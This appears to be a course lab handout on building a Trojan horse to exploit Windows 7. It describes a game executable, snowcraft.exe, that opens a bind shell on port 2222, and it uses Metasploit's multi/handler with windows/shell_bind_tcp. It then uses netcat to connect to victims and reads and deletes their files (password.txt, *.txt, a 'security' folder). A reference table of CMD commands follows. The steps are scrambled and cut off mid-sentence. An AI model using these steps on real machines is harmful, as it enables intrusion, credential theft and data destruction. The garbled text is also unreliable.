Tutorial 7 Trojan Horse
Tutorial 7 Trojan Horse
Tutorial 7 Trojan Horse
On completion of this tutorial, students are expected to understand:
- How to create Trojan horse
- How to exploit Windows 7
Lab steps
14. Run snowcraft.exe, you will see an CMD together with the game.
Play and enjoy games but now your PC is now opening port 2222 for
1. Start Up Kali
o Instructions:
o Open terminal, type msfconsole
o Note:
Metasploit takes about 5 to 20 seconds to start up
2. Set Handler and Payload
o Instructions:
0. use multi/handler
1. set PAYLOAD windows/shell_bind_tcp
o Instructions:
0. cd \
1. dir
2. echo "Your Name"
3. date
4. Press <Enter>
o Partial Proof of Lab:
0. Do a PrtScn
1. Paste into a word document
nc -v x.x.x.x 2222
To connect to victims
type password.txt
del password.txt
del *.txt
rmdir security
CMD Windows
command Description version
call Calls a batch file within another batch file. The All Win/DOS
command has no effect if entered directly into
CMD instead of in a batch file.
chcp Changes the current code page (character set All Win/DOS
table) or shows the page count of the current
code page.
chdir Displays the current directory and lets you All Win/DOS
switch to other directories. With the
parameter /D plus drive and path
specification, you can also switch drives. Use
chdir.. to switch to a higher directory (has the
same function as the cd command).
choice Creates a selection list: typical example is the All Win (not
selection of yes (Y) or no (N), which is created XP)/DOS
with /C YN. With the parameter /M you can
add an explanatory message for the user.
date Displays the current date and allows you to All Win/DOS
change it. With the parameter /T the date is
shown without the option to change.
dir Displays all folders and files within the current All Win/DOS
directory. You can restrict the output by
attributes (/A), simplify the list (/B), or display
all subdirectories and their files (/S).
edit Starts the MS-DOS editor, with which you can 32-bit/DOS
create text files.
path Creates and displays the path for searching All Win/DOS
executable files.
print Prints a text file. The device to be used for All Win/DOS
printing has to be specified.
rem Writes comments in batch and script files that All Win/DOS
aren’t taken into account when executing.
rmdir Deletes a directory. This must not contain any All Win/DOS
files, even hidden ones. You can delete an
entire directory tree with the /S parameter
(you can also use the rd command).
shift Moves variables within batch files and scripts. All Win/DOS
sort Lists out data (from a file or command) and All Win/DOS
outputs it again sorted – directly in the
command prompt, in a new file, or in another